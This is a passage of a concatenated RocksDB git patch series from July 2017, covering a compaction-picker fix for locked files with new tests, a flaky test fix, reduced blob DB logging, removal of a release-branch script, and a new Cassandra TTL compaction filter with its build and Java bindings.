b/db/compaction_picker.cc index f06351c70ce..6ee4ebd1f16 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -1101,11 +1101,7 @@ void LevelCompactionBuilder::SetupInitialFiles() { } output_level_ = (start_level_ == 0) ? vstorage_->base_level() : start_level_ + 1; - if (PickFileToCompact() && - compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_, - &start_level_inputs_) && - !compaction_picker_->FilesRangeOverlapWithCompaction( - {start_level_inputs_}, output_level_)) { + if (PickFileToCompact()) { // found the compaction! if (start_level_ == 0) { // L0 score = `num L0 files` / `level0_file_num_compaction_trigger` @@ -1346,16 +1342,36 @@ bool LevelCompactionBuilder::PickFileToCompact() { nextIndex = i; } - // Do not pick this file if its parents at level+1 are being compacted. - // Maybe we can avoid redoing this work in SetupOtherInputs - parent_index_ = -1; - if (compaction_picker_->IsRangeInCompaction(vstorage_, &f->smallest, - &f->largest, output_level_, - &parent_index_)) { - continue; - } start_level_inputs_.files.push_back(f); start_level_inputs_.level = start_level_; + if (!compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_, + &start_level_inputs_) || + compaction_picker_->FilesRangeOverlapWithCompaction( + {start_level_inputs_}, output_level_)) { + // A locked (pending compaction) input-level file was pulled in due to + // user-key overlap. + start_level_inputs_.clear(); + continue; + } + + // Now that input level is fully expanded, we check whether any output files + // are locked due to pending compaction. + // + // Note we rely on ExpandInputsToCleanCut() to tell us whether any output- + // level files are locked, not just the extra ones pulled in for user-key + // overlap. + InternalKey smallest, largest; + compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest); + CompactionInputFiles output_level_inputs; + output_level_inputs.level = output_level_; + vstorage_->GetOverlappingInputs(output_level_, &smallest, &largest, + &output_level_inputs.files); + if (!output_level_inputs.empty() && + !compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_, + &output_level_inputs)) { + start_level_inputs_.clear(); + continue; + } base_index_ = index; break; } diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index 2e34e9ab277..1ced12cfd5d 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -852,6 +852,80 @@ TEST_F(CompactionPickerTest, OverlappingUserKeys9) { ASSERT_EQ(8U, compaction->input(1, 1)->fd.GetNumber()); } +TEST_F(CompactionPickerTest, OverlappingUserKeys10) { + // Locked file encountered when pulling in extra input-level files with same + // user keys. Verify we pick the next-best file from the same input level. + NewVersionStorage(6, kCompactionStyleLevel); + mutable_cf_options_.max_compaction_bytes = 100000000000u; + + // file_number 2U is largest and thus first choice. But it overlaps with + // file_number 1U which is being compacted. So instead we pick the next- + // biggest file, 3U, which is eligible for compaction. + Add(1 /* level */, 1U /* file_number */, "100" /* smallest */, + "150" /* largest */, 1U /* file_size */); + file_map_[1U].first->being_compacted = true; + Add(1 /* level */, 2U /* file_number */, "150" /* smallest */, + "200" /* largest */, 1000000000U /* file_size */, 0 /* smallest_seq */, + 0 /* largest_seq */); + Add(1 /* level */, 3U /* file_number */, "201" /* smallest */, + "250" /* largest */, 900000000U /* file_size */); + Add(2 /* level */, 4U /* file_number */, "100" /* smallest */, + "150" /* largest */, 1U /* file_size */); + Add(2 /* level */, 5U /* file_number */, "151" /* smallest */, + "200" /* largest */, 1U /* file_size */); + Add(2 /* level */, 6U /* file_number */, "201" /* smallest */, + "250" /* largest */, 1U /* file_size */); + + UpdateVersionStorageInfo(); + + std::unique_ptr compaction(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() != nullptr); + ASSERT_EQ(2U, compaction->num_input_levels()); + ASSERT_EQ(1U, compaction->num_input_files(0)); + ASSERT_EQ(1U, compaction->num_input_files(1)); + ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber()); + ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber()); +} + +TEST_F(CompactionPickerTest, OverlappingUserKeys11) { + // Locked file encountered when pulling in extra output-level files with same + // user keys. Expected to skip that compaction and pick the next-best choice. + NewVersionStorage(6, kCompactionStyleLevel); + mutable_cf_options_.max_compaction_bytes = 100000000000u; + + // score(L1) = 3.7 + // score(L2) = 1.85 + // There is no eligible file in L1 to compact since both candidates pull in + // file_number 5U, which overlaps with a file pending compaction (6U). The + // first eligible compaction is from L2->L3. + Add(1 /* level */, 2U /* file_number */, "151" /* smallest */, + "200" /* largest */, 1000000000U /* file_size */); + Add(1 /* level */, 3U /* file_number */, "201" /* smallest */, + "250" /* largest */, 1U /* file_size */); + Add(2 /* level */, 4U /* file_number */, "100" /* smallest */, + "149" /* largest */, 5000000000U /* file_size */); + Add(2 /* level */, 5U /* file_number */, "150" /* smallest */, + "201" /* largest */, 1U /* file_size */); + Add(2 /* level */, 6U /* file_number */, "201" /* smallest */, + "249" /* largest */, 1U /* file_size */, 0 /* smallest_seq */, + 0 /* largest_seq */); + file_map_[6U].first->being_compacted = true; + Add(3 /* level */, 7U /* file_number */, "100" /* smallest */, + "149" /* largest */, 1U /* file_size */); + + UpdateVersionStorageInfo(); + + std::unique_ptr compaction(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() != nullptr); + ASSERT_EQ(2U, compaction->num_input_levels()); + ASSERT_EQ(1U, compaction->num_input_files(0)); + ASSERT_EQ(1U, compaction->num_input_files(1)); + ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber()); + ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber()); +} + TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri1) { NewVersionStorage(6, kCompactionStyleLevel); mutable_cf_options_.level0_file_num_compaction_trigger = 2; From 3e5ea29a83270e8a0a93afe471022fc41adc8180 Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Thu, 20 Jul 2017 11:22:31 -0700 Subject: [PATCH 021/205] Fix Flaky DeleteSchedulerTest::ImmediateDeleteOn25PercDBSize Summary: In this test we are deleting 100 files, and we are expecting DeleteScheduler to delete 26 files in the background and 74 files immediately in the foreground The main purpose of the test is to make sure that we delete files in foreground thread, which is verified in line 546 But sometimes we may end up with 26 files or 25 files in the trash directory because the background thread may be slow and not be able to delete the first file fast enough, so sometimes this test fail. Remove ``` ASSERT_EQ(CountFilesInDir(trash_dir_), 25); ``` Since it does not have any benefit any way Closes https://github.com/facebook/rocksdb/pull/2618 Differential Revision: D5458674 Pulled By: IslamAbdelRahman fbshipit-source-id: 5556a9edfa049db71dce80b8e6ae0fdd25e1e74e --- util/delete_scheduler_test.cc | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc index 6667289185f..208bdd74177 100644 --- a/util/delete_scheduler_test.cc +++ b/util/delete_scheduler_test.cc @@ -541,10 +541,9 @@ TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) { delete_scheduler_->DeleteFile(file_name); } - // When we end up with 24 files in trash we will start + // When we end up with 26 files in trash we will start // deleting new files immediately ASSERT_EQ(fg_delete_file, 74); - ASSERT_EQ(CountFilesInDir(trash_dir_), 25); rocksdb::SyncPoint::GetInstance()->DisableProcessing(); } From 0302da47a7f5be2a400572477f4bdb8ddc4af5f3 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 20 Jul 2017 14:52:58 -0700 Subject: [PATCH 022/205] Reduce blob db noisy logging Summary: Remove some of the per-key logging by blob db to reduce noise. Closes https://github.com/facebook/rocksdb/pull/2587 Differential Revision: D5429115 Pulled By: yiwu-arbug fbshipit-source-id: b89328282fb8b3c64923ce48738c16017ce7feaf --- utilities/blob_db/blob_db_impl.cc | 72 +++++++++++-------------------- 1 file changed, 26 insertions(+), 46 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 6ee91d5f96b..1dd72b6bc3a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -59,20 +59,14 @@ namespace rocksdb { namespace blob_db { struct GCStats { - uint64_t blob_count; - uint64_t num_deletes; - uint64_t deleted_size; - uint64_t num_relocs; - uint64_t succ_deletes_lsm; - uint64_t succ_relocs; - std::shared_ptr newfile; - GCStats() - : blob_count(0), - num_deletes(0), - deleted_size(0), - num_relocs(0), - succ_deletes_lsm(0), - succ_relocs(0) {} + uint64_t blob_count = 0; + uint64_t num_deletes = 0; + uint64_t deleted_size = 0; + uint64_t num_relocs = 0; + uint64_t succ_deletes_lsm = 0; + uint64_t overrided_while_delete = 0; + uint64_t succ_relocs = 0; + std::shared_ptr newfile = nullptr; }; // BlobHandle is a pointer to the blob that is stored in the LSM @@ -1487,8 +1481,6 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, // file was deleted if (hitr == blob_files_.end()) { - ROCKS_LOG_INFO(db_options_.info_log, - "Could not find file_number %" PRIu64, file_number); return false; } @@ -1522,24 +1514,22 @@ std::pair BlobDBImpl::EvictCompacted(bool aborted) { if (aborted) return std::make_pair(false, -1); override_packet_t packet; + size_t total_vals = 0; + size_t mark_evicted = 0; while (override_vals_q_.dequeue(&packet)) { - bool succ = FindFileAndEvictABlob(packet.file_number_, packet.key_size_, - packet.blob_offset_, packet.blob_size_); - - if (!succ) - ROCKS_LOG_DEBUG( - db_options_.info_log, - "EVICT COMPACTION FAILURE SN: %d FN: %d OFFSET: %d SIZE: %d", - packet.dsn_, packet.file_number_, packet.blob_offset_, - packet.blob_size_); - - if (debug_level_ >= 3) - ROCKS_LOG_INFO( - db_options_.info_log, - "EVICT COMPACTED SN: %d FN: %d OFFSET: %d SIZE: %d SUCC: %d", - packet.dsn_, packet.file_number_, packet.blob_offset_, - packet.blob_size_, succ); + bool succeeded = + FindFileAndEvictABlob(packet.file_number_, packet.key_size_, + packet.blob_offset_, packet.blob_size_); + total_vals++; + if (succeeded) { + mark_evicted++; + } } + ROCKS_LOG_INFO(db_options_.info_log, + "Mark %" ROCKSDB_PRIszt + " values to evict, out of %" ROCKSDB_PRIszt + " compacted values.", + mark_evicted, total_vals); return std::make_pair(true, -1); } @@ -1810,21 +1800,11 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, txn->Delete(cfh, record.Key()); Status s1 = txn->Commit(); // chances that this DELETE will fail is low. If it fails, it would be - // because - // a new version of the key came in at this time, which will override - // the current version being iterated on. - if (s1.IsBusy()) { - ROCKS_LOG_INFO(db_options_.info_log, - "Optimistic transaction failed delete: %s bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); - } else { - ROCKS_LOG_DEBUG( - db_options_.info_log, - "Successfully added delete back into LSM: %s bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); - + // because a new version of the key came in at this time, which will + // override the current version being iterated on. + if (!s1.IsBusy()) { // assume that failures happen due to new writes. - gcstats->succ_deletes_lsm++; + gcstats->overrided_while_delete++; } delete txn; continue; From 63163a8c6eb12b03608a80216ea169e5b0b022c8 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 20 Jul 2017 20:28:43 -0700 Subject: [PATCH 023/205] Remove make_new_version.sh Summary: Seems the only function of the script is to create a new branch, which can be done easily. I'm removing it. Closes https://github.com/facebook/rocksdb/pull/2623 Differential Revision: D5468681 Pulled By: yiwu-arbug fbshipit-source-id: 87dea5ecc4c85e06941ccbc36993f7f589063878 --- build_tools/make_new_version.sh | 53 --------------------------------- 1 file changed, 53 deletions(-) delete mode 100755 build_tools/make_new_version.sh diff --git a/build_tools/make_new_version.sh b/build_tools/make_new_version.sh deleted file mode 100755 index edcb36c1f93..00000000000 --- a/build_tools/make_new_version.sh +++ /dev/null @@ -1,53 +0,0 @@ -#!/bin/bash -# Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -# This source code is licensed under the BSD-style license found in the -# LICENSE file in the root directory of this source tree. An additional grant -# of patent rights can be found in the PATENTS file in the same directory. - -set -e -if [ -z "$GIT" ] -then - GIT="git" -fi - -# Print out the colored progress info so that it can be brainlessly -# distinguished by users. -function title() { - echo -e "\033[1;32m$*\033[0m" -} - -usage="Create new RocksDB version and prepare it for the release process\n" -usage+="USAGE: ./make_new_version.sh []\n" -usage+=" version: specify a version without '.fb' suffix (e.g. 5.4).\n" -usage+=" remote: name of the remote to push the branch to (default: origin)." - -# -- Pre-check -if [[ $# < 1 ]]; then - echo -e $usage - exit 1 -fi - -ROCKSDB_VERSION=$1 - -REMOTE="origin" -if [[ $# > 1 ]]; then - REMOTE=$2 -fi - -GIT_BRANCH=`git rev-parse --abbrev-ref HEAD` -echo $GIT_BRANCH - -if [ $GIT_BRANCH != "master" ]; then - echo "Error: Current branch is '$GIT_BRANCH', Please switch to master branch." - exit 1 -fi - -title "Adding new tag for this release ..." -BRANCH="$ROCKSDB_VERSION.fb" -$GIT checkout -b $BRANCH - -# Setting up the proxy for remote repo access -title "Pushing new branch to remote repo ..." -git push $REMOTE --set-upstream $BRANCH - -title "Branch $BRANCH is pushed to github;" From 534c255c7ab7ba73aaab1f82f8c1a92388eab00e Mon Sep 17 00:00:00 2001 From: Pengchao Wang Date: Fri, 21 Jul 2017 14:42:32 -0700 Subject: [PATCH 024/205] Cassandra compaction filter for purge expired columns and rows Summary: Major changes in this PR: * Implement CassandraCompactionFilter to remove expired columns and rows (if all column expired) * Move cassandra related code from utilities/merge_operators/cassandra to utilities/cassandra/* * Switch to use shared_ptr<> from uniqu_ptr for Column membership management in RowValue. Since columns do have multiple owners in Merge and GC process, use shared_ptr helps make RowValue immutable. * Rename cassandra_merge_test to cassandra_functional_test and add two TTL compaction related tests there. Closes https://github.com/facebook/rocksdb/pull/2588 Differential Revision: D5430010 Pulled By: wpc fbshipit-source-id: 9566c21e06de17491d486a68c70f52d501f27687 --- CMakeLists.txt | 15 +- Makefile | 10 +- TARGETS | 17 +- java/CMakeLists.txt | 3 + java/Makefile | 1 + .../rocksjni/cassandra_compactionfilterjni.cc | 22 ++ java/rocksjni/cassandra_value_operator.cc | 2 +- .../rocksdb/CassandraCompactionFilter.java | 18 ++ src.mk | 16 +- .../cassandra/cassandra_compaction_filter.cc | 47 ++++ .../cassandra/cassandra_compaction_filter.h | 39 +++ .../cassandra/cassandra_format_test.cc | 71 ++++- .../cassandra/cassandra_functional_test.cc | 251 ++++++++++++++++++ .../cassandra/cassandra_row_merge_test.cc | 6 +- .../cassandra/cassandra_serialize_test.cc | 4 +- .../{merge_operators => }/cassandra/format.cc | 104 ++++++-- .../{merge_operators => }/cassandra/format.h | 61 +++-- .../cassandra/merge_operator.cc | 2 +- .../cassandra/merge_operator.h | 0 .../cassandra/serialize.h | 0 .../cassandra/test_utils.cc | 24 +- .../cassandra/test_utils.h | 10 +- .../cassandra/cassandra_merge_test.cc | 134 ---------- 23 files changed, 617 insertions(+), 240 deletions(-) create mode 100644 java/rocksjni/cassandra_compactionfilterjni.cc create mode 100644 java/src/main/java/org/rocksdb/CassandraCompactionFilter.java create mode 100644 utilities/cassandra/cassandra_compaction_filter.cc create mode 100644 utilities/cassandra/cassandra_compaction_filter.h rename utilities/{merge_operators => }/cassandra/cassandra_format_test.cc (80%) create mode 100644 utilities/cassandra/cassandra_functional_test.cc rename utilities/{merge_operators => }/cassandra/cassandra_row_merge_test.cc (92%) rename utilities/{merge_operators => }/cassandra/cassandra_serialize_test.cc (96%) rename utilities/{merge_operators => }/cassandra/format.cc (75%) rename utilities/{merge_operators => }/cassandra/format.h (80%) rename utilities/{merge_operators => }/cassandra/merge_operator.cc (98%) rename utilities/{merge_operators => }/cassandra/merge_operator.h (100%) rename utilities/{merge_operators => }/cassandra/serialize.h (100%) rename utilities/{merge_operators => }/cassandra/test_utils.cc (73%) rename utilities/{merge_operators => }/cassandra/test_utils.h (82%) delete mode 100644 utilities/merge_operators/cassandra/cassandra_merge_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 2d56c8d7daf..1eb98b2265b 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -482,6 +482,9 @@ set(SOURCES utilities/blob_db/blob_log_reader.cc utilities/blob_db/blob_log_writer.cc utilities/blob_db/blob_log_format.cc + utilities/cassandra/cassandra_compaction_filter.cc + utilities/cassandra/format.cc + utilities/cassandra/merge_operator.cc utilities/checkpoint/checkpoint_impl.cc utilities/col_buf_decoder.cc utilities/col_buf_encoder.cc @@ -500,8 +503,6 @@ set(SOURCES utilities/memory/memory_util.cc utilities/merge_operators/max.cc utilities/merge_operators/put.cc - utilities/merge_operators/cassandra/format.cc - utilities/merge_operators/cassandra/merge_operator.cc utilities/merge_operators/string_append/stringappend.cc utilities/merge_operators/string_append/stringappend2.cc utilities/merge_operators/uint64add.cc @@ -705,6 +706,10 @@ set(TESTS util/thread_local_test.cc utilities/backupable/backupable_db_test.cc utilities/blob_db/blob_db_test.cc + utilities/cassandra/cassandra_functional_test.cc + utilities/cassandra/cassandra_format_test.cc + utilities/cassandra/cassandra_row_merge_test.cc + utilities/cassandra/cassandra_serialize_test.cc utilities/checkpoint/checkpoint_test.cc utilities/column_aware_encoding_test.cc utilities/date_tiered/date_tiered_test.cc @@ -713,10 +718,6 @@ set(TESTS utilities/geodb/geodb_test.cc utilities/lua/rocks_lua_test.cc utilities/memory/memory_test.cc - utilities/merge_operators/cassandra/cassandra_merge_test.cc - utilities/merge_operators/cassandra/cassandra_format_test.cc - utilities/merge_operators/cassandra/cassandra_row_merge_test.cc - utilities/merge_operators/cassandra/cassandra_serialize_test.cc utilities/merge_operators/string_append/stringappend_test.cc utilities/object_registry_test.cc utilities/option_change_migration/option_change_migration_test.cc @@ -757,7 +758,7 @@ set(TESTUTIL_SOURCE monitoring/thread_status_updater_debug.cc table/mock_table.cc util/fault_injection_test_env.cc - utilities/merge_operators/cassandra/test_utils.cc + utilities/cassandra/test_utils.cc ) # test utilities are only build in debug enable_testing() diff --git a/Makefile b/Makefile index 1b273224b22..c40d741d7a8 100644 --- a/Makefile +++ b/Makefile @@ -405,7 +405,7 @@ TESTS = \ write_buffer_manager_test \ stringappend_test \ cassandra_format_test \ - cassandra_merge_test \ + cassandra_functional_test \ cassandra_row_merge_test \ cassandra_serialize_test \ ttl_test \ @@ -1000,16 +1000,16 @@ option_change_migration_test: utilities/option_change_migration/option_change_mi stringappend_test: utilities/merge_operators/string_append/stringappend_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_format_test: utilities/merge_operators/cassandra/cassandra_format_test.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_format_test: utilities/cassandra/cassandra_format_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_merge_test: utilities/merge_operators/cassandra/cassandra_merge_test.o utilities/merge_operators/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_functional_test: utilities/cassandra/cassandra_functional_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_row_merge_test: utilities/merge_operators/cassandra/cassandra_row_merge_test.o utilities/merge_operators/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_row_merge_test: utilities/cassandra/cassandra_row_merge_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_serialize_test: utilities/merge_operators/cassandra/cassandra_serialize_test.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_serialize_test: utilities/cassandra/cassandra_serialize_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) redis_test: utilities/redis/redis_lists_test.o $(LIBOBJECTS) $(TESTHARNESS) diff --git a/TARGETS b/TARGETS index 1bafb01caa0..134bb5081d3 100644 --- a/TARGETS +++ b/TARGETS @@ -212,6 +212,9 @@ cpp_library( "utilities/blob_db/blob_log_reader.cc", "utilities/blob_db/blob_log_writer.cc", "utilities/blob_db/blob_log_format.cc", + "utilities/cassandra/cassandra_compaction_filter.cc", + "utilities/cassandra/format.cc", + "utilities/cassandra/merge_operator.cc", "utilities/checkpoint/checkpoint_impl.cc", "utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc", "utilities/convenience/info_log_finder.cc", @@ -226,8 +229,6 @@ cpp_library( "utilities/leveldb_options/leveldb_options.cc", "utilities/lua/rocks_lua_compaction_filter.cc", "utilities/memory/memory_util.cc", - "utilities/merge_operators/cassandra/format.cc", - "utilities/merge_operators/cassandra/merge_operator.cc", "utilities/merge_operators/max.cc", "utilities/merge_operators/put.cc", "utilities/merge_operators/string_append/stringappend.cc", @@ -275,7 +276,7 @@ cpp_library( "util/testharness.cc", "util/testutil.cc", "db/db_test_util.cc", - "utilities/merge_operators/cassandra/test_utils.cc", + "utilities/cassandra/test_utils.cc", "utilities/col_buf_encoder.cc", "utilities/col_buf_decoder.cc", "utilities/column_aware_encoding_util.cc", @@ -325,16 +326,16 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['c_test', 'db/c_test.c', 'serial'], ['cache_test', 'cache/cache_test.cc', 'serial'], ['cassandra_format_test', - 'utilities/merge_operators/cassandra/cassandra_format_test.cc', + 'utilities/cassandra/cassandra_format_test.cc', 'serial'], - ['cassandra_merge_test', - 'utilities/merge_operators/cassandra/cassandra_merge_test.cc', + ['cassandra_functional_test', + 'utilities/cassandra/cassandra_functional_test.cc', 'serial'], ['cassandra_row_merge_test', - 'utilities/merge_operators/cassandra/cassandra_row_merge_test.cc', + 'utilities/cassandra/cassandra_row_merge_test.cc', 'serial'], ['cassandra_serialize_test', - 'utilities/merge_operators/cassandra/cassandra_serialize_test.cc', + 'utilities/cassandra/cassandra_serialize_test.cc', 'serial'], ['checkpoint_test', 'utilities/checkpoint/checkpoint_test.cc', 'serial'], ['cleanable_test', 'table/cleanable_test.cc', 'serial'], diff --git a/java/CMakeLists.txt b/java/CMakeLists.txt index 6a22cee265a..a34cda6ca85 100644 --- a/java/CMakeLists.txt +++ b/java/CMakeLists.txt @@ -24,6 +24,7 @@ set(JNI_NATIVE_SOURCES rocksjni/options.cc rocksjni/ratelimiterjni.cc rocksjni/remove_emptyvalue_compactionfilterjni.cc + rocksjni/cassandra_compactionfilterjni.cc rocksjni/restorejni.cc rocksjni/rocksdb_exception_test.cc rocksjni/rocksjni.cc @@ -55,6 +56,8 @@ set(NATIVE_JAVA_CLASSES org.rocksdb.BlockBasedTableConfig org.rocksdb.BloomFilter org.rocksdb.Cache + org.rocksdb.CassandraCompactionFilter + org.rocksdb.CassandraValueMergeOperator org.rocksdb.Checkpoint org.rocksdb.ClockCache org.rocksdb.ColumnFamilyHandle diff --git a/java/Makefile b/java/Makefile index 1210159af0a..b29447bd8a7 100644 --- a/java/Makefile +++ b/java/Makefile @@ -7,6 +7,7 @@ NATIVE_JAVA_CLASSES = org.rocksdb.AbstractCompactionFilter\ org.rocksdb.BloomFilter\ org.rocksdb.Checkpoint\ org.rocksdb.ClockCache\ + org.rocksdb.CassandraCompactionFilter\ org.rocksdb.CassandraValueMergeOperator\ org.rocksdb.ColumnFamilyHandle\ org.rocksdb.ColumnFamilyOptions\ diff --git a/java/rocksjni/cassandra_compactionfilterjni.cc b/java/rocksjni/cassandra_compactionfilterjni.cc new file mode 100644 index 00000000000..9d77559ab5d --- /dev/null +++ b/java/rocksjni/cassandra_compactionfilterjni.cc @@ -0,0 +1,22 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#include + +#include "include/org_rocksdb_CassandraCompactionFilter.h" +#include "utilities/cassandra/cassandra_compaction_filter.h" + +/* + * Class: org_rocksdb_CassandraCompactionFilter + * Method: createNewCassandraCompactionFilter0 + * Signature: ()J + */ +jlong Java_org_rocksdb_CassandraCompactionFilter_createNewCassandraCompactionFilter0( + JNIEnv* env, jclass jcls, jboolean purge_ttl_on_expiration) { + auto* compaction_filter = + new rocksdb::cassandra::CassandraCompactionFilter(purge_ttl_on_expiration); + // set the native handle to our native compaction filter + return reinterpret_cast(compaction_filter); +} diff --git a/java/rocksjni/cassandra_value_operator.cc b/java/rocksjni/cassandra_value_operator.cc index 889213b9c8a..6be6614075a 100644 --- a/java/rocksjni/cassandra_value_operator.cc +++ b/java/rocksjni/cassandra_value_operator.cc @@ -20,7 +20,7 @@ #include "rocksdb/table.h" #include "rocksdb/slice_transform.h" #include "rocksdb/merge_operator.h" -#include "utilities/merge_operators/cassandra/merge_operator.h" +#include "utilities/cassandra/merge_operator.h" /* * Class: org_rocksdb_CassandraValueMergeOperator diff --git a/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java new file mode 100644 index 00000000000..05d9aabcf00 --- /dev/null +++ b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java @@ -0,0 +1,18 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. + +package org.rocksdb; + +/** + * Just a Java wrapper around CassandraCompactionFilter implemented in C++ + */ +public class CassandraCompactionFilter + extends AbstractCompactionFilter { + public CassandraCompactionFilter(boolean purgeTtlOnExpiration) { + super(createNewCassandraCompactionFilter0(purgeTtlOnExpiration)); + } + + private native static long createNewCassandraCompactionFilter0(boolean purgeTtlOnExpiration); +} diff --git a/src.mk b/src.mk index 8250947f596..fb7f979396c 100644 --- a/src.mk +++ b/src.mk @@ -159,6 +159,9 @@ LIB_SOURCES = \ utilities/blob_db/blob_log_reader.cc \ utilities/blob_db/blob_log_writer.cc \ utilities/blob_db/blob_log_format.cc \ + utilities/cassandra/cassandra_compaction_filter.cc \ + utilities/cassandra/format.cc \ + utilities/cassandra/merge_operator.cc \ utilities/checkpoint/checkpoint_impl.cc \ utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc \ utilities/convenience/info_log_finder.cc \ @@ -173,8 +176,6 @@ LIB_SOURCES = \ utilities/leveldb_options/leveldb_options.cc \ utilities/lua/rocks_lua_compaction_filter.cc \ utilities/memory/memory_util.cc \ - utilities/merge_operators/cassandra/format.cc \ - utilities/merge_operators/cassandra/merge_operator.cc \ utilities/merge_operators/max.cc \ utilities/merge_operators/put.cc \ utilities/merge_operators/string_append/stringappend.cc \ @@ -225,7 +226,7 @@ TEST_LIB_SOURCES = \ util/testharness.cc \ util/testutil.cc \ db/db_test_util.cc \ - utilities/merge_operators/cassandra/test_utils.cc \ + utilities/cassandra/test_utils.cc \ MAIN_SOURCES = \ cache/cache_bench.cc \ @@ -329,6 +330,10 @@ MAIN_SOURCES = \ util/thread_local_test.cc \ utilities/backupable/backupable_db_test.cc \ utilities/blob_db/blob_db_test.cc \ + utilities/cassandra/cassandra_format_test.cc \ + utilities/cassandra/cassandra_functional_test.cc \ + utilities/cassandra/cassandra_row_merge_test.cc \ + utilities/cassandra/cassandra_serialize_test.cc \ utilities/checkpoint/checkpoint_test.cc \ utilities/column_aware_encoding_exp.cc \ utilities/column_aware_encoding_test.cc \ @@ -339,10 +344,6 @@ MAIN_SOURCES = \ utilities/lua/rocks_lua_test.cc \ utilities/memory/memory_test.cc \ utilities/merge_operators/string_append/stringappend_test.cc \ - utilities/merge_operators/cassandra/cassandra_merge_test.cc \ - utilities/merge_operators/cassandra/cassandra_format_test.cc \ - utilities/merge_operators/cassandra/cassandra_row_merge_test.cc \ - utilities/merge_operators/cassandra/cassandra_serialize_test.cc \ utilities/object_registry_test.cc \ utilities/option_change_migration/option_change_migration_test.cc \ utilities/options/options_util_test.cc \ @@ -379,6 +380,7 @@ JNI_NATIVE_SOURCES = \ java/rocksjni/options.cc \ java/rocksjni/ratelimiterjni.cc \ java/rocksjni/remove_emptyvalue_compactionfilterjni.cc \ + java/rocksjni/cassandra_compactionfilterjni.cc \ java/rocksjni/restorejni.cc \ java/rocksjni/rocksjni.cc \ java/rocksjni/rocksdb_exception_test.cc \ diff --git a/utilities/cassandra/cassandra_compaction_filter.cc b/utilities/cassandra/cassandra_compaction_filter.cc new file mode 100644 index 00000000000..e817972ee35 --- /dev/null +++ b/utilities/cassandra/cassandra_compaction_filter.cc @@ -0,0 +1,47 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#include "utilities/cassandra/cassandra_compaction_filter.h" +#include +#include "rocksdb/slice.h" +#include "utilities/cassandra/format.h" + + +namespace rocksdb { +namespace cassandra { + +const char* CassandraCompactionFilter::Name() const { + return "CassandraCompactionFilter"; +} + +CompactionFilter::Decision CassandraCompactionFilter::FilterV2( + int level, + const Slice& key, + ValueType value_type, + const Slice& existing_value, + std::string* new_value, + std::string* skip_until) const { + + bool value_changed = false; + RowValue row_value = RowValue::Deserialize( + existing_value.data(), existing_value.size()); + RowValue compacted = purge_ttl_on_expiration_ ? + row_value.PurgeTtl(&value_changed) : + row_value.ExpireTtl(&value_changed); + + if(compacted.Empty()) { + return Decision::kRemove; + } + + if (value_changed) { + compacted.Serialize(new_value); + return Decision::kChangeValue; + } + + return Decision::kKeep; +} + +} // namespace cassandra +} // namespace rocksdb diff --git a/utilities/cassandra/cassandra_compaction_filter.h b/utilities/cassandra/cassandra_compaction_filter.h new file mode 100644 index 00000000000..c09b8e74aa1 --- /dev/null +++ b/utilities/cassandra/cassandra_compaction_filter.h @@ -0,0 